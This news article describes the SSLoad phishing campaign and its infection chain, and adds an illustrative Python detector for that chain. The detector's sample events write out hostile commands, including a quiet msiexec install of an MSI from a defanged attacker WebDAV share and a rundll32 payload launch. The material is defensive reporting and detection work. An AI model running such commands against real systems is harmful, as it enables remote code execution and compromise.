Cybersecurity researchers have discovered an ongoing attack campaign that leverages phishing emails to spread malware called SSLoad.
The campaign, codenamed ICE CREAM#SHADOW by Securonix, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software.
“SSLoad is designed to stealthily infiltrate systems, collect sensitive information, and transmit the results to its operators,” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.
“Once inside the system, SSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection.”
The attack chains involve phishing messages that randomly target organizations in Asia, Europe and the Americas; the emails contain links that lead to the retrieval of a JavaScript file, which initiates the infection flow.
Earlier this month, Palo Alto Networks identified at least two different methods by which SSLoad is distributed: one uses website contact forms to embed booby-trapped URLs, and the other uses macro-laced Microsoft Word documents.
The latter is also notable because the malware acts as a conduit for Cobalt Strike, while the former was used to spread a different malware called Latrodectus, a likely successor to IcedID.
The obfuscated JavaScript file (“out_czlrh.js”), when launched via wscript.exe, retrieves an MSI installer file (“slack.msi”) by connecting to a network share located at “\\wireoneinternet[.]info@80\share\” and runs it using msiexec.exe.
The MSI installer, for its part, contacts an attacker-controlled domain to retrieve and execute the SSLoad malware payload using rundll32.exe, after which the malware connects to a command-and-control (C2) server and sends information about the compromised system.
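The process chain described above (wscript.exe launching msiexec.exe against a WebDAV-style share, followed by rundll32.exe) is something a defender can hunt for in process-creation telemetry. The following detector is an added example, not code from the Securonix report; the Sysmon-style event tuples, PIDs and file paths are constructed for illustration, and the defanged share name from the article is kept as-is in the sample.

```python
"""Flag the SSLoad-style chain: script host -> msiexec.exe pulling an MSI
from a \\host@port\ (WebDAV over HTTP) share -> rundll32.exe child.
Events are constructed Sysmon Event ID 1 style tuples: (pid, parent_pid,
image, command_line). Paths and PIDs are assumptions for this example."""
import re
from collections import defaultdict

EVENTS = [
    (100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (200, 100, r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\u\Downloads\out_czlrh.js"'),
    (300, 200, r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i \\wireoneinternet[.]info@80\share\slack.msi /qn"),
    (400, 300, r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Users\u\AppData\Local\Temp\payload.dll,Start"),
    # Benign msiexec run from a local path: must not alert.
    (500, 100, r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\installers\legit.msi"),
]

# UNC path whose host component carries an @<port> suffix, i.e. a share
# resolved over WebDAV/HTTP rather than SMB.
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@\d+\\")

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_ssload_like_chains(events):
    """Return one alert per msiexec.exe spawned by a script host with a
    WebDAV UNC source, listing any rundll32.exe children it went on to start."""
    by_pid = {pid: (ppid, img, cmd) for pid, ppid, img, cmd in events}
    children = defaultdict(list)
    for pid, ppid, _, _ in events:
        children[ppid].append(pid)
    alerts = []
    for pid, (ppid, img, cmd) in by_pid.items():
        if image_name(img) != "msiexec.exe" or ppid not in by_pid:
            continue
        parent = image_name(by_pid[ppid][1])
        if parent not in ("wscript.exe", "cscript.exe"):
            continue
        if not WEBDAV_UNC.search(cmd):
            continue
        followups = [c for c in children[pid]
                     if image_name(by_pid[c][1]) == "rundll32.exe"]
        alerts.append({"msiexec_pid": pid, "parent": parent,
                       "rundll32_pids": followups})
    return alerts

if __name__ == "__main__":
    for alert in find_ssload_like_chains(EVENTS):
        print(alert)
```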
The initial reconnaissance phase paves the way for Cobalt Strike, a legitimate adversary simulation software, which is then used to download and install ScreenConnect, thus allowing threat actors to remotely commandeer the host.
“With full access to the system, threat actors began attempting to acquire credentials and collect other critical system details,” the researchers said. “At this point they began scanning the victim’s host for credentials stored in files and other potentially sensitive documents.”
Attackers were also observed moving laterally to other systems on the network, including the domain controller, and then taking over the victim’s Windows domain by creating their own domain administrator account.
“With this level of access, they could access any connected machine within the domain,” the researchers said. “Ultimately, this is the worst-case scenario for any organization as remediating the level of persistence achieved by the attackers would be incredibly time-consuming and expensive.”
The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that Linux systems were infected with an open-source remote access trojan called Pupy RAT.